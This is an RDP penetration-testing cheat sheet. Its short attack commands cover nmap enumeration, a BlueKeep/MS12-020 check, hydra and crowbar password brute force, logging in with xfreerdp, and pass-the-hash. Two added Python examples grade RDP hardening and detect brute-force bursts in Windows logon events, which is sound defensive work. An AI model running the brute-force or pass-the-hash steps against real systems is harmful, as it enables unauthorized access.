RDP (3389)

Check if accessible

RDP enum scripts — Version, encryption, NLA

nmap --script 'rdp-*' -p 3389 $IP   (quote the glob so the shell does not expand it against local files)
Example Output
nmap --script 'rdp-*' -p 3389 10.10.10.5
| rdp-ntlm-info:
|   Target: TARGET
|   DNS: target.corp.local
|   OS: Windows Server 2019
|   NLA: Enabled
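The enumeration output above is only useful if someone turns it into a hardening verdict. The following is an added example (not part of the cheat sheet and not nmap's own code) that parses the blocks printed by the rdp-enum-encryption and rdp-ntlm-info scripts and lists the gaps they reveal: a still-accepted legacy "Native RDP" security layer (NLA not enforced), 40/56-bit RC4, an encryption level below High, and the pre-auth hostname/build leak. The sample output is constructed in the format those two scripts print; the registry value names in the finding text (SecurityLayer, UserAuthentication under the RDP-Tcp WinStation key) are the standard ones.

```python
"""Added example: grade `nmap --script 'rdp-*' -p 3389 <host>` output.
Not from the cheat sheet or from nmap; the sample below is constructed."""
import re
from typing import Dict, List

# Constructed sample: a host that still accepts the legacy security layer
# and weak RC4 ciphers, i.e. NLA is available but not enforced.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: SUCCESS
|     RDSTLS: SUCCESS
|     SSL: SUCCESS
|   RDP Encryption level: Client Compatible
|     40-bit RC4: SUCCESS
|     56-bit RC4: SUCCESS
|     128-bit RC4: SUCCESS
|     FIPS 140-1: SUCCESS
|_  RDP Protocol Version:  RDP 5.x, 6.x, 7.x, or 8.x server
| rdp-ntlm-info:
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: TARGET
|   DNS_Domain_Name: corp.local
|   DNS_Computer_Name: target.corp.local
|   Product_Version: 10.0.17763
|_  System_Time: 2025-01-10T12:00:00+00:00
"""


def parse_rdp_scripts(text: str) -> Dict[str, Dict[str, str]]:
    """Return {script_name: {key: value}} for every '| rdp-...:' block.
    Group headers without a value (e.g. 'Security layer') are skipped."""
    scripts: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue                       # port table / non-script lines
        body = line.lstrip("|_").strip()
        m = re.match(r"^([a-z0-9-]+):\s*$", body)   # '| rdp-enum-encryption:'
        if m and m.group(1).startswith("rdp-"):
            current = scripts.setdefault(m.group(1), {})
            continue
        if current is not None and ":" in body:
            key, _, value = body.partition(":")
            if value.strip():
                current[key.strip()] = value.strip()
    return scripts


def assess(scripts: Dict[str, Dict[str, str]]) -> List[str]:
    """Map the parsed values to concrete hardening findings."""
    findings: List[str] = []
    enc = scripts.get("rdp-enum-encryption", {})
    if enc.get("Native RDP") == "SUCCESS":
        findings.append("legacy 'Native RDP' security layer accepted: NLA is not "
                        "enforced (RDP-Tcp SecurityLayer=2, UserAuthentication=1)")
    for cipher in ("40-bit RC4", "56-bit RC4"):
        if enc.get(cipher) == "SUCCESS":
            findings.append(f"weak cipher {cipher} accepted")
    level = enc.get("RDP Encryption level")
    if level and level not in ("High", "FIPS Compliant"):
        findings.append(f"RDP encryption level is '{level}', not High/FIPS Compliant")
    ntlm = scripts.get("rdp-ntlm-info", {})
    if "Product_Version" in ntlm:
        findings.append(f"pre-auth info leak: host {ntlm.get('DNS_Computer_Name')} "
                        f"reports build {ntlm['Product_Version']}")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_rdp_scripts(SAMPLE_NMAP_OUTPUT)):
        print("-", finding)
```

Feed it real output with `nmap ... -oN` and the same parser applies; a hardened host shows `Native RDP: FAILED` and the 40/56-bit lines absent or failed, which yields an empty finding list apart from the NTLM build leak, which is inherent to NLA's CredSSP handshake.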

BlueKeep check

CVE-2019-0708 — Pre-auth RCE if unpatched
Note: nmap's rdp-vuln-ms12-020 script tests for MS12-020 (CVE-2012-0002), not for CVE-2019-0708; treat a hit as "unpatched legacy RDP" and confirm BlueKeep exposure with a dedicated CVE-2019-0708 check or by verifying the host's patch level.

nmap --script rdp-vuln-ms12-020 -p 3389 $IP
Example Output
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   CVE:CVE-2019-0708
(Pre-auth RCE, use with caution - may BSOD)

Brute force

With known usernames — Weak passwords

hydra -l <user> -P passwords.txt rdp://$IP
Example Output
hydra -l administrator -P passwords.txt rdp://10.10.10.5
[3389][rdp] host: 10.10.10.5 login: administrator password: Winter2025!

OR: crowbar -b rdp -s 10.10.10.5/32 -u admin -C passwords.txt
(crowbar is more reliable for RDP brute force)
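The server-side view of a hydra or crowbar run is a burst of Security event 4625 from one source IP, followed by a 4624 with logon type 10 once a password lands. The following detection is an added example (not from the cheat sheet or from any named tool) that runs a per-IP sliding window over pre-parsed events; the event dicts and their timestamps are constructed. It assumes the usual field names of 4624/4625 (EventID, LogonType, IpAddress, TargetUserName, TimeCreated) and the fact that, with NLA enabled, failed RDP attempts are logged as logon type 3 (the CredSSP pre-auth) rather than type 10.

```python
"""Added example: flag RDP password guessing in Windows Security events.
Not from the cheat sheet; SAMPLE_EVENTS is constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

FAIL_THRESHOLD = 10           # 4625s from one IP inside WINDOW -> alert
WINDOW = timedelta(minutes=5)


def _ev(ts: str, event_id: int, logon_type: int, ip: str, user: str) -> dict:
    """Build one event dict with the 4624/4625 fields the detector reads."""
    return {"TimeCreated": datetime.fromisoformat(ts), "EventID": event_id,
            "LogonType": logon_type, "IpAddress": ip, "TargetUserName": user}


# Constructed: 12 failures for 'administrator' in 33 s from 10.10.14.7 (type 3,
# NLA pre-auth) then an interactive success; plus a user who mistyped twice.
SAMPLE_EVENTS = (
    [_ev(f"2025-01-10T09:00:{s:02d}", 4625, 3, "10.10.14.7", "administrator")
     for s in range(0, 36, 3)]
    + [_ev("2025-01-10T09:00:40", 4624, 10, "10.10.14.7", "administrator"),
       _ev("2025-01-10T09:05:00", 4625, 10, "10.10.20.15", "jsmith"),
       _ev("2025-01-10T09:05:20", 4625, 10, "10.10.20.15", "jsmith"),
       _ev("2025-01-10T09:05:45", 4624, 10, "10.10.20.15", "jsmith")]
)


def detect_rdp_bruteforce(events: List[dict]) -> List[Dict]:
    """Per source IP: alert 'bruteforce' once FAIL_THRESHOLD failures fall inside
    WINDOW; escalate to 'bruteforce_success' if an interactive (type 10) 4624
    from the same IP follows the burst."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        if e["EventID"] == 4625 and e["LogonType"] in (3, 10):
            by_ip[e["IpAddress"]].append(e)
        elif e["EventID"] == 4624 and e["LogonType"] == 10:
            by_ip[e["IpAddress"]].append(e)

    alerts: List[Dict] = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["EventID"] == 4625]
        burst_end = None
        # sliding window: first position where 10 consecutive failures fit in WINDOW
        for i in range(len(fails) - FAIL_THRESHOLD + 1):
            span = fails[i + FAIL_THRESHOLD - 1]["TimeCreated"] - fails[i]["TimeCreated"]
            if span <= WINDOW:
                burst_end = fails[i + FAIL_THRESHOLD - 1]["TimeCreated"]
                break
        if burst_end is None:
            continue
        successes = [e for e in evs
                     if e["EventID"] == 4624 and e["TimeCreated"] >= burst_end]
        alerts.append({
            "ip": ip,
            "severity": "bruteforce_success" if successes else "bruteforce",
            "failures": len(fails),
            "users": sorted({e["TargetUserName"] for e in fails}),
            "compromised": sorted({e["TargetUserName"] for e in successes}),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

The two-failure user never trips the window, the guessing source does, and the later 4624 from the same IP turns it into a compromised-account alert, which is the moment that matters for response. An account lockout policy (visible as event 4740) and NLA are the controls that blunt this class of attack in the first place.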

Connect with found creds

xfreerdp (or rdesktop) — Full GUI access

xfreerdp /u:<user> /p:<pass> /v:$IP
Example Output
xfreerdp /u:admin /p:Password123 /v:10.10.10.5
[INFO] Connected to 10.10.10.5:3389
(Full GUI desktop access)

Pass the hash

If you have NTLM hash — No password needed (xfreerdp /pth only works when the target has Restricted Admin mode enabled; otherwise the logon is refused)

xfreerdp /u:<user> /pth:<hash> /v:$IP
Example Output (this sample is from crackmapexec against SMB on 445, not from the xfreerdp command above)
crackmapexec smb 10.10.10.20 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
SMB  10.10.10.20  445  WEB01  [+] CORP\administrator:... (Pwn3d!)
(Admin access with just the hash)